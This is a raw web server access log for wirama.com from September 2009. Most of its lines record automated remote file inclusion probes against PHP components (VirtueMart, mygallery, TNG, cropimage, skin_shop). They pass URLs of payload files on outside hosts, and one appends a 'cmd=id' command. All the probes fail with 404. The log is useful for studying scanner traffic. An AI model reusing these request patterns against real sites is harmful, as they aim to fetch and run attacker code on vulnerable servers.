65.18.168.84 - - [01/Sep/2009:08:17:16 -0700] "GET /logs//board/skin_shop/standard/2_view_body/body_default.php?GOODS[no]=http://www.biig.net/httpdocs/wp-content/uploads/js_cache/cyber.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.wirama.com"
222.122.142.174 - - [01/Sep/2009:08:19:20 -0700] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.geocities.com/briyan_aq/wondho/zfxid.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
222.122.142.174 - - [01/Sep/2009:08:19:20 -0700] "GET /logs/access_090801.log//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.geocities.com/briyan_aq/wondho/zfxid.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
222.122.142.174 - - [01/Sep/2009:08:19:20 -0700] "GET /administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.geocities.com/briyan_aq/wondho/zfxid.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
65.18.168.84 - - [01/Sep/2009:08:20:49 -0700] "GET /logs/access_090329.log//board/skin_shop/standard/2_view_body/body_default.php?GOODS[no]=http://www.biig.net/httpdocs/wp-content/uploads/js_cache/cyber.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.wirama.com"
65.18.168.84 - - [01/Sep/2009:08:20:49 -0700] "GET /board/skin_shop/standard/2_view_body/body_default.php?GOODS[no]=http://www.biig.net/httpdocs/wp-content/uploads/js_cache/cyber.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.wirama.com"
65.18.168.84 - - [01/Sep/2009:08:20:49 -0700] "GET /logs//board/skin_shop/standard/2_view_body/body_default.php?GOODS[no]=http://www.biig.net/httpdocs/wp-content/uploads/js_cache/cyber.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.wirama.com"
65.18.168.84 - - [01/Sep/2009:08:20:59 -0700] "GET /logs/access_090329.log//board/skin_shop/standard/2_view_body/body_default.php?GOODS[no]=http://www.biig.net/httpdocs/wp-content/uploads/js_cache/cyber.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.wirama.com"
65.18.168.84 - - [01/Sep/2009:08:20:59 -0700] "GET /board/skin_shop/standard/2_view_body/body_default.php?GOODS[no]=http://www.biig.net/httpdocs/wp-content/uploads/js_cache/cyber.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.wirama.com"
65.18.168.84 - - [01/Sep/2009:08:20:59 -0700] "GET /logs//board/skin_shop/standard/2_view_body/body_default.php?GOODS[no]=http://www.biig.net/httpdocs/wp-content/uploads/js_cache/cyber.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.wirama.com"
65.18.168.84 - - [01/Sep/2009:08:21:03 -0700] "GET /logs/access_090329.log//board/skin_shop/standard/2_view_body/body_default.php?GOODS[no]=http://www.biig.net/httpdocs/wp-content/uploads/js_cache/cyber.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.wirama.com"
65.18.168.84 - - [01/Sep/2009:08:21:03 -0700] "GET /board/skin_shop/standard/2_view_body/body_default.php?GOODS[no]=http://www.biig.net/httpdocs/wp-content/uploads/js_cache/cyber.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.wirama.com"
65.18.168.84 - - [01/Sep/2009:08:21:03 -0700] "GET /logs//board/skin_shop/standard/2_view_body/body_default.php?GOODS[no]=http://www.biig.net/httpdocs/wp-content/uploads/js_cache/cyber.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.wirama.com"
65.18.168.84 - - [01/Sep/2009:08:21:20 -0700] "GET /board/skin_shop/standard/2_view_body/body_default.php?GOODS[no]=http://www.biig.net/httpdocs/wp-content/uploads/js_cache/cyber.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.wirama.com"
65.18.168.84 - - [01/Sep/2009:08:21:20 -0700] "GET /board/skin_shop/standard/2_view_body/body_default.php?GOODS[no]=http://www.biig.net/httpdocs/wp-content/uploads/js_cache/cyber.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.wirama.com"
65.18.168.84 - - [01/Sep/2009:08:21:21 -0700] "GET /board/skin_shop/standard/2_view_body/body_default.php?GOODS[no]=http://www.biig.net/httpdocs/wp-content/uploads/js_cache/cyber.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "wirama.com"
65.18.168.84 - - [01/Sep/2009:08:21:21 -0700] "GET /logs//board/skin_shop/standard/2_view_body/body_default.php?GOODS[no]=http://www.biig.net/httpdocs/wp-content/uploads/js_cache/cyber.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "wirama.com"
65.18.168.84 - - [01/Sep/2009:08:21:37 -0700] "GET /board/skin_shop/standard/2_view_body/body_default.php?GOODS[no]=http://www.biig.net/httpdocs/wp-content/uploads/js_cache/cyber.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.wirama.com"
65.18.168.84 - - [01/Sep/2009:08:22:55 -0700] "GET /logs/access_090501.log//board/skin_shop/standard/2_view_body/body_default.php?GOODS[no]=http://www.biig.net/httpdocs/wp-content/uploads/js_cache/cyber.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.wirama.com"
174.133.161.130 - - [01/Sep/2009:08:23:24 -0700] "GET /logs///skin/zero_vote/ask_password.php?dir=http://jrigutto.com/osc/images/id? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "www.wirama.com"
65.18.168.84 - - [01/Sep/2009:08:23:26 -0700] "GET /logs/access_090501.log//board/skin_shop/standard/2_view_body/body_default.php?GOODS[no]=http://www.biig.net/httpdocs/wp-content/uploads/js_cache/cyber.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.wirama.com"
65.18.168.84 - - [01/Sep/2009:08:23:43 -0700] "GET /logs/access_090501.log//board/skin_shop/standard/2_view_body/body_default.php?GOODS[no]=http://www.biig.net/httpdocs/wp-content/uploads/js_cache/cyber.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.wirama.com"
190.144.44.36 - - [01/Sep/2009:08:25:19 -0700] "GET /logs/access_090601.log//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://aboutav.com//o/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
72.11.145.8 - - [01/Sep/2009:08:29:39 -0700] "GET /logs/access_090329.log//board/skin_shop/standard/2_view_body/body_default.php?GOODS[no]=http://www.trac-juegos.com.ar/fzadmin/bobs.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.wirama.com"
72.11.145.8 - - [01/Sep/2009:08:29:39 -0700] "GET /board/skin_shop/standard/2_view_body/body_default.php?GOODS[no]=http://www.trac-juegos.com.ar/fzadmin/bobs.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.wirama.com"
72.11.145.8 - - [01/Sep/2009:08:29:39 -0700] "GET /logs//board/skin_shop/standard/2_view_body/body_default.php?GOODS[no]=http://www.trac-juegos.com.ar/fzadmin/bobs.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.wirama.com"
72.11.145.8 - - [01/Sep/2009:08:29:41 -0700] "GET /logs/access_090501.log//board/skin_shop/standard/2_view_body/body_default.php?GOODS[no]=http://www.trac-juegos.com.ar/fzadmin/bobs.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.wirama.com"
82.194.85.198 - - [01/Sep/2009:08:35:39 -0700] "GET /skin/zero_vote/ask_password.php?dir=http://jrigutto.com/osc/images/id? HTTP/1.1" 404 275 "-" "libwww-perl/5.831" "www.wirama.com"
82.194.85.198 - - [01/Sep/2009:08:35:59 -0700] "GET /skin/zero_vote/ask_password.php?dir=http://jrigutto.com/osc/images/id? HTTP/1.1" 404 275 "-" "libwww-perl/5.831" "www.wirama.com"
78.191.196.112 - - [01/Sep/2009:08:49:14 -0700] "GET /components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://bluepadma.com/t.dat?&list=1&cmd=id HTTP/1.0" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0b; Windows NT 5.0)" "www.wirama.com"
72.30.87.93 - - [01/Sep/2009:08:49:25 -0700] "GET /?S=A HTTP/1.0" 200 900 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.wirama.com"
222.122.72.216 - - [01/Sep/2009:08:53:43 -0700] "GET /logs///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://bookbinding.kr/bbs/include/get_reply_files/rfiid.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "wirama.com"
222.122.72.216 - - [01/Sep/2009:08:53:43 -0700] "GET //administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://bookbinding.kr/bbs/include/get_reply_files/rfiid.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "wirama.com"
193.6.139.221 - - [01/Sep/2009:08:54:44 -0700] "GET /logs/access_090501.log///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://bookbinding.kr/bbs/include/get_reply_files/rfiid.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.wirama.com"
193.6.139.221 - - [01/Sep/2009:08:54:44 -0700] "GET //administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://bookbinding.kr/bbs/include/get_reply_files/rfiid.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.wirama.com"
193.6.139.221 - - [01/Sep/2009:08:54:44 -0700] "GET /logs///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://bookbinding.kr/bbs/include/get_reply_files/rfiid.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.wirama.com"
72.11.145.8 - - [01/Sep/2009:08:56:42 -0700] "GET /logs//board/skin_shop/standard/2_view_body/body_default.php?GOODS[no]=http://www.trac-juegos.com.ar/fzadmin/bobs.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "wirama.com"
72.11.145.8 - - [01/Sep/2009:08:56:42 -0700] "GET /board/skin_shop/standard/2_view_body/body_default.php?GOODS[no]=http://www.trac-juegos.com.ar/fzadmin/bobs.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "wirama.com"
193.6.139.221 - - [01/Sep/2009:08:58:11 -0700] "GET /logs///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://bookbinding.kr/bbs/include/get_reply_files/rfiid.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "wirama.com"
193.6.139.221 - - [01/Sep/2009:08:58:11 -0700] "GET //administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://bookbinding.kr/bbs/include/get_reply_files/rfiid.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "wirama.com"
222.122.72.216 - - [01/Sep/2009:09:01:41 -0700] "GET /logs/access_090801.log///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.tabakoff.ru//dimti/AinuLid1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
222.122.72.216 - - [01/Sep/2009:09:01:41 -0700] "GET //administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.tabakoff.ru//dimti/AinuLid1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
222.122.72.216 - - [01/Sep/2009:09:01:41 -0700] "GET /logs///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.tabakoff.ru//dimti/AinuLid1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
222.122.72.216 - - [01/Sep/2009:09:01:43 -0700] "GET //administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.tabakoff.ru//dimti/AinuLid1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
222.122.72.216 - - [01/Sep/2009:09:01:44 -0700] "GET /logs///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.tabakoff.ru//dimti/AinuLid1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
222.122.72.216 - - [01/Sep/2009:09:01:44 -0700] "GET /logs/access_090801.log///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.tabakoff.ru//dimti/AinuLid1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
222.122.72.216 - - [01/Sep/2009:09:01:47 -0700] "GET //administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.tabakoff.ru//dimti/AinuLid1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
222.122.72.216 - - [01/Sep/2009:09:01:47 -0700] "GET /logs///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.tabakoff.ru//dimti/AinuLid1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
222.122.72.216 - - [01/Sep/2009:09:01:47 -0700] "GET /logs/access_090801.log///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.tabakoff.ru//dimti/AinuLid1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
151.8.79.19 - - [01/Sep/2009:09:02:01 -0700] "GET /logs/access_090401.log//kboard.php?board=sightseeing&cid=1&Pagefile=01//kboard/kboard.php?board=free&act=http://geocities.com/freenzyz@ymail.com/zx.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
222.122.72.216 - - [01/Sep/2009:09:06:03 -0700] "GET //administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.eifel-karneval.de/schneifelnarren/theme/images/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.wirama.com"
66.132.216.24 - - [01/Sep/2009:09:06:54 -0700] "GET /wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://duelshop.com/.kde/cgi-bin/ext/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
66.132.216.24 - - [01/Sep/2009:09:06:54 -0700] "GET /logs//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://duelshop.com/.kde/cgi-bin/ext/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
66.132.216.24 - - [01/Sep/2009:09:06:54 -0700] "GET /logs/access.log%20%20//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://duelshop.com/.kde/cgi-bin/ext/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
222.122.72.216 - - [01/Sep/2009:09:07:09 -0700] "GET /logs///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://bookbinding.kr/bbs/include/get_reply_files/rfiid.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "wirama.com"
222.122.72.216 - - [01/Sep/2009:09:07:09 -0700] "GET //administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://bookbinding.kr/bbs/include/get_reply_files/rfiid.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "wirama.com"
72.30.87.93 - - [01/Sep/2009:09:10:11 -0700] "GET /tmp/?N=A HTTP/1.0" 200 504 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.wirama.com"
66.148.68.101 - - [01/Sep/2009:09:10:12 -0700] "GET /logs/access_090501.log/historytemplate.php?cms[support]=1&cms[tngpath]=http://www.yamagiku.net//admin/install/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
66.148.68.101 - - [01/Sep/2009:09:10:12 -0700] "GET /historytemplate.php?cms[support]=1&cms[tngpath]=http://www.yamagiku.net//admin/install/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
66.148.68.101 - - [01/Sep/2009:09:10:12 -0700] "GET /logs/historytemplate.php?cms[support]=1&cms[tngpath]=http://www.yamagiku.net//admin/install/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
66.148.68.101 - - [01/Sep/2009:09:10:27 -0700] "GET /logs/access_090329.log/historytemplate.php?cms[support]=1&cms[tngpath]=http://www.yamagiku.net//admin/install/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
216.65.20.79 - - [01/Sep/2009:09:10:49 -0700] "GET /logs//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://dogstudio.net/ampoll/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
216.65.20.79 - - [01/Sep/2009:09:10:49 -0700] "GET /wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://dogstudio.net/ampoll/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
216.65.20.79 - - [01/Sep/2009:09:10:49 -0700] "GET /logs/access.log%20%20//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://dogstudio.net/ampoll/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
66.148.68.101 - - [01/Sep/2009:09:11:38 -0700] "GET /logs/access_090501.log%20%20/historytemplate.php?cms[support]=1&cms[tngpath]=http://www.yamagiku.net//admin/install/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
66.148.68.101 - - [01/Sep/2009:09:11:39 -0700] "GET /logs/access_090329.log%20%20/historytemplate.php?cms[support]=1&cms[tngpath]=http://www.yamagiku.net//admin/install/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
66.148.68.101 - - [01/Sep/2009:09:12:07 -0700] "GET /historytemplate.php?cms[support]=1&cms[tngpath]=http://www.yamagiku.net//admin/install/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
66.148.68.101 - - [01/Sep/2009:09:12:07 -0700] "GET /logs/access_090801.log/historytemplate.php?cms[support]=1&cms[tngpath]=http://www.yamagiku.net//admin/install/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
66.148.68.101 - - [01/Sep/2009:09:12:07 -0700] "GET /logs/historytemplate.php?cms[support]=1&cms[tngpath]=http://www.yamagiku.net//admin/install/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
222.122.72.216 - - [01/Sep/2009:09:12:31 -0700] "GET /logs///administrator/components/com_virtuemart/toolbar.php?mosConfig_absolute_path=http://bookbinding.kr/bbs/include/get_reply_files/rfiid.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "wirama.com"
222.122.72.216 - - [01/Sep/2009:09:12:31 -0700] "GET //administrator/components/com_virtuemart/toolbar.php?mosConfig_absolute_path=http://bookbinding.kr/bbs/include/get_reply_files/rfiid.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "wirama.com"
218.38.34.182 - - [01/Sep/2009:09:14:42 -0700] "GET /logs///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://bookbinding.kr/bbs/include/get_reply_files/rfiid.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.wirama.com"
218.38.34.182 - - [01/Sep/2009:09:14:42 -0700] "GET /logs/access_090501.log///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://bookbinding.kr/bbs/include/get_reply_files/rfiid.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.wirama.com"
218.38.34.182 - - [01/Sep/2009:09:14:44 -0700] "GET //administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://bookbinding.kr/bbs/include/get_reply_files/rfiid.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.wirama.com"
218.38.136.251 - - [01/Sep/2009:09:16:46 -0700] "GET /historytemplate.php?cms[support]=1&cms[tngpath]=http://www.koreadefence.net/data/shirohige/zfxid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
218.38.136.251 - - [01/Sep/2009:09:16:46 -0700] "GET /logs/historytemplate.php?cms[support]=1&cms[tngpath]=http://www.koreadefence.net/data/shirohige/zfxid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
218.38.136.251 - - [01/Sep/2009:09:16:47 -0700] "GET /logs/access_090329.log%20%20/historytemplate.php?cms[support]=1&cms[tngpath]=http://www.koreadefence.net/data/shirohige/zfxid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
218.38.136.251 - - [01/Sep/2009:09:16:47 -0700] "GET /logs/access_090501.log%20%20/historytemplate.php?cms[support]=1&cms[tngpath]=http://www.koreadefence.net/data/shirohige/zfxid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
222.122.72.216 - - [01/Sep/2009:09:17:00 -0700] "GET /logs/administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://www.housedesign.kr/zb41/icon/private_icon/idade1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
222.122.72.216 - - [01/Sep/2009:09:17:00 -0700] "GET /logs/access_090601.log/administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://www.housedesign.kr/zb41/icon/private_icon/idade1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
222.122.72.216 - - [01/Sep/2009:09:17:00 -0700] "GET /administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://www.housedesign.kr/zb41/icon/private_icon/idade1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
222.122.72.216 - - [01/Sep/2009:09:17:10 -0700] "GET /logs/administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://www.housedesign.kr/zb41/icon/private_icon/idade1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
222.122.72.216 - - [01/Sep/2009:09:17:10 -0700] "GET /administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://www.housedesign.kr/zb41/icon/private_icon/idade1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
222.122.72.216 - - [01/Sep/2009:09:17:10 -0700] "GET /logs/access_090601.log/administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://www.housedesign.kr/zb41/icon/private_icon/idade1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
222.236.47.188 - - [01/Sep/2009:09:17:36 -0700] "GET /logs/access_090329.log%20%20/historytemplate.php?cms[support]=1&cms[tngpath]=http://www.koreadefence.net/data/shirohige/zfxid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
222.236.47.188 - - [01/Sep/2009:09:17:36 -0700] "GET /historytemplate.php?cms[support]=1&cms[tngpath]=http://www.koreadefence.net/data/shirohige/zfxid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
222.236.47.188 - - [01/Sep/2009:09:17:37 -0700] "GET /logs/access_090501.log%20%20/historytemplate.php?cms[support]=1&cms[tngpath]=http://www.koreadefence.net/data/shirohige/zfxid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
222.236.47.188 - - [01/Sep/2009:09:17:37 -0700] "GET /logs/historytemplate.php?cms[support]=1&cms[tngpath]=http://www.koreadefence.net/data/shirohige/zfxid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
222.236.47.188 - - [01/Sep/2009:09:17:45 -0700] "GET /logs/access_090329.log%20%20/historytemplate.php?cms[support]=1&cms[tngpath]=http://www.koreadefence.net/data/shirohige/zfxid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
222.236.47.188 - - [01/Sep/2009:09:17:45 -0700] "GET /historytemplate.php?cms[support]=1&cms[tngpath]=http://www.koreadefence.net/data/shirohige/zfxid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
222.236.47.188 - - [01/Sep/2009:09:17:45 -0700] "GET /logs/historytemplate.php?cms[support]=1&cms[tngpath]=http://www.koreadefence.net/data/shirohige/zfxid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
222.236.47.188 - - [01/Sep/2009:09:17:45 -0700] "GET /logs/access_090501.log%20%20/historytemplate.php?cms[support]=1&cms[tngpath]=http://www.koreadefence.net/data/shirohige/zfxid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
216.65.20.79 - - [01/Sep/2009:09:18:04 -0700] "GET /wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://dogstudio.net/ampoll/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
216.65.20.79 - - [01/Sep/2009:09:18:04 -0700] "GET /logs//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://dogstudio.net/ampoll/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
216.65.20.79 - - [01/Sep/2009:09:18:04 -0700] "GET /logs/access_090801.log//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://dogstudio.net/ampoll/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
222.122.72.216 - - [01/Sep/2009:09:18:09 -0700] "GET /administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://www.scv.co.kr/img/top/idade1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
222.122.72.216 - - [01/Sep/2009:09:18:09 -0700] "GET /logs/access_090601.log/administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://www.scv.co.kr/img/top/idade1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
222.122.72.216 - - [01/Sep/2009:09:18:09 -0700] "GET /logs/administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://www.scv.co.kr/img/top/idade1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
222.122.72.216 - - [01/Sep/2009:09:18:10 -0700] "GET /administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://www.housedesign.kr/zb41/icon/private_icon/idade1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
222.122.72.216 - - [01/Sep/2009:09:18:10 -0700] "GET /logs/access_090601.log/administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://www.housedesign.kr/zb41/icon/private_icon/idade1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
222.122.72.216 - - [01/Sep/2009:09:18:10 -0700] "GET /logs/administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://www.housedesign.kr/zb41/icon/private_icon/idade1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
65.55.106.138 - - [01/Sep/2009:09:18:24 -0700] "GET /robots.txt HTTP/1.1" 404 275 "-" "msnbot/2.0b (+http://search.msn.com/msnbot.htm)" "wirama.com"
222.122.72.216 - - [01/Sep/2009:09:18:39 -0700] "GET /administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://srbmusic.co.kr/bbs/icon/private_icon/idade1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
222.122.72.216 - - [01/Sep/2009:09:18:39 -0700] "GET /logs/administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://srbmusic.co.kr/bbs/icon/private_icon/idade1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
222.122.72.216 - - [01/Sep/2009:09:18:39 -0700] "GET /logs/access_090601.log/administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://srbmusic.co.kr/bbs/icon/private_icon/idade1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
65.55.106.138 - - [01/Sep/2009:09:19:35 -0700] "GET /logs/?D=A HTTP/1.0" 200 2835 "-" "msnbot/2.0b (+http://search.msn.com/msnbot.htm)" "wirama.com"
